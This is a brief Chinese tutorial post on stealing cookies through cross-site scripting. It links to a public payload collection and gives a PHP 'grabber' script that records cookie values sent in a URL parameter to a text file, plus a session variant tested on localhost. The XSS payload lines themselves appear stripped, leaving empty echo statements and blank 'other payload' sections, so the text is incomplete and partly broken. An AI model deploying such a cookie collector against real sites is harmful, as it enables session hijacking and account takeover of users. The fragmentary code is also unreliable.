XSS拿Cookie

payload:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection#exploit-code-or-poc

XSS/grabber.php


// How to use it
echo "

";

// Write the cookie in a file
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fclose($fp);

?>

XSS拿Cookie_第1张图片

或者:
直接在grabber.php里这样写:


// How to use it
session_start();
echo "

";

?>

然后访问:http://localhost/grabber.php
Cookie(内容为PHPSESSIONID)发送成功。
XSS拿Cookie_第2张图片

其他Payload:




不用括号和分号XSS:



XSS拿Cookie_第3张图片
参考:https://portswigger.net/blog/xss-without-parentheses-and-semi-colons

你可能感兴趣的:(Web)